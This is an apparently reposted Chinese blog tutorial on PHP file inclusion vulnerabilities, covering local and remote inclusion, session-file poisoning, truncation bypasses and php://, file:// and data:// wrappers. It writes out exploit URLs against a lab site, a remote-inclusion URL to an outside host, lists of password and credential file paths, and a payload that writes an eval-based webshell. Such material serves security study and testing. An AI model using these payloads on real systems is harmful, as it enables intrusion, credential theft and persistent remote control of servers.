文件包含漏洞

最新推荐文章于 2023-09-14 15:27:53 发布
最新推荐文章于 2023-09-14 15:27:53 发布
阅读量274 收藏
点赞数

参考文档:https://www.freebuf.com/articles/web/182280.html
0x01简介
服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。这以诶这你可以创建供所有网页引用的标准页眉或者带单文件。当页眉需要更新时,你只更新一个包含文件就可以了,或者当你想网站添加一张新页面时,仅仅需要修改一下菜单文件,而不是更新所有网页中的链接。
文件包含函数
PHP中文件包含函数有一下四种:
require();
require_once();
include();
include_once();
include和require主要区别是,include在包含的过程中如果出现错误,会抛出一个警告,程序继续整除运行;而require函数出现错误的时候,会直接报错并退出程序的执行。
而include_once(),require_once()这两个函数,与前两个的不同之处在于这两个函数只包含一次,适用于在脚本执行期间同一个文件有可能被包括超过一次的情况下,你想确保它只被包括一次以避免函数重定义,变量重新赋值等问题。
漏洞产生原因
文件包含函数加载的参数没有经过过滤或者严格的定义,可以被用户控制,包含其他恶意文件,导致了执行了非预期的代码。
ex:

<?php
    $filename  = $_GET['filename'];
    include($filename);
?>

例如:
$_GET['filename']参数开发者没有经过严格的过滤,直接带入了include的函数,攻击者可以修改 $_GET['filename']的值,执行非预期的操作。

0x02本地文件包含漏洞
#无限制本地文件包含漏洞
测试代码:

<?php
    $filename  = $_GET['filename'];
    include($filename);
?>

测试结果:
通过目录遍历就可以获取到系统中的其他文件内容。
常见的敏感信息路径:
Windows系统:

c:\boot.ini // 查看系统版本

c:\windows\system32\inetsrv\MetaBase.xml // IIS配置文件

c:\windows\repair\sam // 存储Windows系统初次安装的密码

c:\ProgramFiles\mysql\my.ini // MySQL配置

c:\ProgramFiles\mysql\data\mysql\user.MYD // MySQL root密码

c:\windows\php.ini // php 配置信息

Linux/Unix系统:

/etc/passwd // 账户信息

/etc/shadow // 账户密码文件

/usr/local/app/apache2/conf/httpd.conf // Apache2默认配置文件

/usr/local/app/apache2/conf/extra/httpd-vhost.conf // 虚拟网站配置

/usr/local/app/php5/lib/php.ini // PHP相关配置

/etc/httpd/conf/httpd.conf // Apache配置文件

/etc/my.conf // mysql 配置文件

#session文件包含漏洞
利用条件:session的存储位置可以获取。
1.通过phpinfo的信息可以获取到session的存储位置。
获取到session.save_path为/var/lib/php/session
获取到session的存储位置
2.通过猜测默认的session存放位置进行尝试。
如linux下默认存储在/var/lib/php/session目录下
session中的内容可以被控制,传入恶意代码。
例如:

<?php

session_start();

$ctfs=$_GET['ctfs'];

$_SESSION["username"]=$ctfs;

?>

分析:此php会将获取到的GET的ctfs变量的值存入到session中。当访问xxx.php?ctfs=ctfs后,会在/var/lib/php/session目录下存储session的值。session的文件名为sess_sessionid,sessionid可以通过开发者模式获取。
在这里插入图片描述
所以session的文件名为sess_akp79gfiedh13ho11i6f3sm6s6。
到服务器的/var/lib/php/session目录下查看:

username|s:4:"ctfs";

[root@c21336db44d2 session]# cat sess_akp79gfiedh13ho11i6f3sm6s6

username|s:4:"ctfs"

漏洞利用
通过上面的分析,可以知道ctfs传入的值会存储到session文件中,如果存在本地文件包含漏洞,就可以通过ctfs写入恶意代码到session文件中,然后通过文件包含漏洞执行此恶意代码getshell。
当访问xxx.php?ctfs=<?php phpinfo();?>后,会在/var/lib/php/session目录下存储session的值

[root@6da845537b27 session]# cat sess_83317220159fc31cd7023422f64bea1a

username|s:18:"<?php phpinfo();?>";

攻击者通过phpinfo()信息泄露或者猜测能获取到session存放的位置,文件名称通过开发者模式可获取到,然后通过文件包含的漏洞解析恶意代码getshell。
在这里插入图片描述
#有限制本地文件包含漏洞绕过
%00截断
条件:magic_quotes_gpc=off 且PHP版本< 5.3.4
测试代码:

<?php
    $filename  = $_GET['filename'];
    include($filename . ".html");
?>

测试结果:http://www.ctfs-wiki.com/FI/FI.php?filename=../../../../../../../boot.ini%00
在这里插入图片描述
路径长度截断
条件:Windows os,点号需要长于256;Linux os长于4096
Windows下目录最大长度为256字节,超出的部分会被丢弃;

Linux下目录最大长度为4096字节,超出的部分会被丢弃。
测试代码:

<?php
    $filename  = $_GET['filename'];
    include($filename . ".html");
?>

EXP:

http://www.ctfs-wiki.com/FI/FI.php?filename=test.txt/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././

在这里插入图片描述
点号截断
条件:Windows os,点号需要长于256
测试代码:

<?php
    $filename  = $_GET['filename'];
    include($filename . ".html");
?>

EXP:

http://www.ctfs-wiki.com/FI/FI.php
?filename=test.txt.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

在这里插入图片描述

0x03远程文件包含漏洞

PHP的配置文件allow_url_fopen和allow_url_include设置为ON,include/require等包含函数可以加载远程文件,如果远程文件没经过严格的过滤,导致了执行恶意文件的代码,这就是远程文件包含漏洞。
allow_url_fopen = On(是否允许打开远程文件)

allow_url_include = On(是否允许include/require远程文件)
#无限制远程文件包含漏洞
测试代码:

<?php
    $filename  = $_GET['filename'];
    include($filename);
?>

在这里插入图片描述
通过远程文件包含漏洞,包含php.txt可以解析

http://www.ctfs-wiki.com/FI/FI.php?filename=http://192.168.91.133/FI/php.txt

测试结果:
在这里插入图片描述
#有限制远程文件包含漏洞绕过
测试代码:

<?php include($_GET['filename'] . ".html"); ?>

代码中添加了html后缀,导致远程包含的文件也会多一个html后缀。
在这里插入图片描述
问号绕过

http://www.ctfs-wiki.com/FI/WFI.php?filename=http://192.168.91.133/FI/php.txt?

在这里插入图片描述
#号绕过

http://www.ctfs-wiki.com/FI/WFI.php?filename=http://192.168.91.133/FI/php.txt%23

在这里插入图片描述
空格绕过

http://www.ctfs-wiki.com/FI/WFI.php?filename=http://192.168.91.133/FI/php.txt
在这里插入图片描述

0x04PHP伪协议
PHP中代用很多内置的URL风格的封装协议,可用于类似fopen()、copy()、file_exists()和filesize()的文件系统函数。除了这些封装协议,还能通过stream_wrapper_register()来注册自定义的封装协议。
#目录
在这里插入图片描述

php://输入输出流
PHP提供了一些杂项输入/输出(IO)流,允许访问PHP的输入输出流、标准输入输出和错误描述符,内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。

php://filter(本地磁盘文件进行读取)
元封装器,设计用于“数据流打开”时的“筛选过滤”应用,对本地磁盘文件进行读写。
用法:

?filename=php://filter/convert.base64-encode/resource=xxx.php ?filename=php://filter/read=convert.base64-encode/resource=xxx.php

条件:知识读取,需要开启allow_url_fopen,不需要开启allow_url_include;
在这里插入图片描述
测试代码:

<?php
    $filename  = $_GET['filename'];
    include($filename);
?>

在这里插入图片描述

php://input(读取post数据)
碰到file_get_contents()就要想到用php://input 绕过,因为PHP伪协议也是可以利用http协议的,即可以使用post方式传数据,具体函数意义:
测试代码:

<?php
    echo file_get_contents("php://input");
?>

测试结果:
在这里插入图片描述

php://input(写入木马)
测试代码:

<?php
    $filename  = $_GET['filename'];
    include($filename);
?>

条件:php配置文件中需同时开启allow_url_fopen和allow_url_include(PHP < 6.3.0),就可以造成任意文件代码执行,在这可以理解成远程文件包含漏洞(RFI),即post过去PHP代码,即可执行。
如果post的数据是执行写入一句话木马的PHP代码,就会在当前目录下写入一个木马。

<?PHP fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>');?>

在这里插入图片描述
测试结果:
在这里插入图片描述
如果不开启allow_url_include会报错:
在这里插入图片描述

php://input(命令执行)
测试代码:

<?php
    $filename  = $_GET['filename'];
    include($filename);
?>

条件:php配置文件中需同时开启 allow_url_fopen 和 allow_url_include(PHP < 5.30),就可以造成任意代码执行,在这可以理解成远程文件包含漏洞(RFI),即POST过去PHP代码,即可执行;
在这里插入图片描述
如果不开启allow_url_include会报错:
在这里插入图片描述

file://伪协议(读取文件内容)
通过file协议可以访问本地文件系统,读取到文件的内容。
测试代码:

<?php
    $filename  = $_GET['filename'];
    include($filename);
?>

在这里插入图片描述

data://伪协议
数据流封装器,和php://相似都是利用了流的概念,将原本的include的文件流重定向到了用户可控制的输入流中,简单来说就是执行文件的包含方法包含了你的输入流,通过你输入payload来实现目的; data://text/plain;base64,dGhlIHVzZXIgaXMgYWRtaW4
data://(读取文件)
和php伪协议的input类似,碰到file_get_contents()来用; <?php // 打印 “I love PHP” echo file_get_contents(‘data://text/plain;base64,SSBsb3ZlIFBIUAo=’); ?>
注意:

北境L
关注
Html可能存在的漏洞
永不垂头的博客
07-23 2140
学习笔记—Html可能存在的漏洞 Html可能存在的漏洞 HTML称为超文本标记语言,是一种标识性的语言。它包括一系列标签.通过这些标签可以将网络上的文档格式统一,使分散的Internet资源连接为一个逻辑整体。HTML文本是由HTML命令组成的描述性文本,HTML命令可以说明文字,图形、动画、声音、表格、链接等。 <p></p>段落 <div></div>块 基础、网页必备 纯的html 基本上是不会有漏洞 点击劫持 ```javascript ```
WEB漏洞文件包含漏洞
holen_的博客
01-25 2594
介绍 所谓文件包含漏洞,故名思意,就是在文件中包含(引用)了其他文件所导致的漏洞。例如有些函数在不同代码中的作用都是相同的,在这里我们可以称呼它为“变量”,那么这时程序员就会将该“变量”放在一个文件中,在其他代码中引用该变量文件即可。 当这种灵活性通过动态变量的方式引入需要包含的文件时,用户对这个变量可控而且服务端又没有做合理的校验或者校验被绕过就造成了文件包含漏洞。 脚本利用 我们先创建一个带有文件包含脚本的PHP文件放在服务器上,代码如下 <?php $filename=$_GET['file
任意文件包含漏洞的绕过方式
qq_41679358的博客
08-23 3824
本文转自行云博客https://www.xy586.top/ 文章目录前期准备长目录截断原理payload%00截断原理payload基于session机制传马条件:payload总结 前期准备 file.php代码 <?php $a = $_GET['a']; include($a.'.html'); ?> hack.php代码 <?php fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"]);?&.
渗透之路 WEB漏洞【第六篇】文件包含漏洞
dfu65065的博客
09-20 240
包含漏洞简介 包含操作,在大多数Web语言中都会提供的功能,但PHP对于包含文件所提供的功能太强大,太灵活,所以包含漏洞经常出现在PHP语言中,这也就导致了出现了一个错误现状,很多初学者认为包含漏洞只出现PHP语言之中,殊不知在其他语言中可能出现包含漏洞。 PHP包含漏洞分类 PHP中的四个包含文件函数include(),include_once(),require()和requi...
通达OA v11.8 getway.php 远程文件包含漏洞.md
09-07
通达OA漏洞合集
Web应用安全:文件包含漏洞简介.pptx
06-18
文件包含漏洞是Web应用安全领域中的一个重要话题,它主要源于开发者在编程时为了代码复用而采用的文件包含机制。这种机制允许程序动态地加载和执行存储在不同文件中的代码,但同时也为攻击者提供了可乘之机。下面将...
Apache Tomcat 文件包含漏洞(CNVD-2020-10487,对应 CVE-2020-1938)
03-05
CNVD-2020-10487 和 CVE-2020-1938 是同一个安全漏洞的不同命名,这个漏洞被称为“Apache Tomcat 文件包含漏洞”。此漏洞的存在使得攻击者有可能通过精心构造的请求,将恶意代码注入到Tomcat服务器上,从而执行任意...
ctf-wiki本地搭建记录
https://goodlunatic.github.io/
04-20 5145
ctf-wiki官网访问速度太慢了,而且时常会访问不了, 因此我决定将它直接搭建在本地。 一、先从github上下载压缩包到本地,并解压 二、在命令窗口中执行以下命令 Tips:我电脑的Python是用py运行的( •̀ ω •́ )y # 2. requirements pip install -r requirements.txt # generate static file in site/ py scripts/docs.py build-all # deploy at http://1
CTF-WIKI部署注意事项
最新发布
syy的博客
09-14 543
1、python3.6版本无法部署,后来我使用的是python3.8版本。2、使用Google浏览器打开CTF-WIKI网站。CTF-WIKI是网络攻防一个开源的学习平台。由于github加载过慢,所以将其部署在本地。
文件包含漏洞实例操作
一枚努力的蛋蛋
08-23 1190
文件包含漏洞实例操作本地文件包含漏洞无限制本地文件包含漏洞session文件包含漏洞 本地文件包含漏洞 无限制本地文件包含漏洞 测试代码: 访问: 1.http://localhost/0x01.php?filename=D:/phpstudy/test.php(访问绝对路径,也可以访问其它盘) 2.http://localhost/0x01.php?filename=…/…/…/…/…/…/...
Web安全实战系列:文件包含漏洞
qq_46184013的博客
04-15 435
转自https://www.freebuf.com/articles/web/182280.html 留给自己看
文件包含漏洞小结
刘启明
06-19 515
1. 原理 在通过服务器脚本的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露、恶意代码的注入等。 开发过程中,多个文件都会用到的代码,通常会放到一个单独的文件中,用到时再包含进来。当把包含的文件写死在程序中时,该漏洞是不存在的,但很多情况都会动态的去包含所需的文件,这时候则会产生文件包含漏洞。 实例代码 <?php $filename...
文件包含漏洞03】文件包含漏洞的空字符绕过及六种利用方式
Fighting_hawk的博客
03-11 5642
1. 关于图片马的几种执行方式总结: (1)利用中间件解析漏洞,不同中间件不同版本的利用方式往往不同。 (2)利用.htaccess修改Apache局部配置。 (3) 利用文件包含执行漏洞。 2. 了解PHP魔术引号的作用。 3. 掌握文件包含漏洞空字符绕过的方法。 4. 掌握文件包含漏洞的六种利用方式。...
Web-9(33-36)-BUUCTF平台
~airrudder~
04-22 2815
本篇内容 [CISCN2019 华北赛区 Day1 Web1]Dropbox [CISCN2019 华北赛区 Day1 Web2]ikun [ASIS 2019]Unicorn shop [安洵杯 2019]easy_web 上一篇 | 目录 | 下一篇 [CISCN2019 华北赛区 Day1 Web1]Dropbox [CISCN2019 华北赛区 Day1 Web2]ikun...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值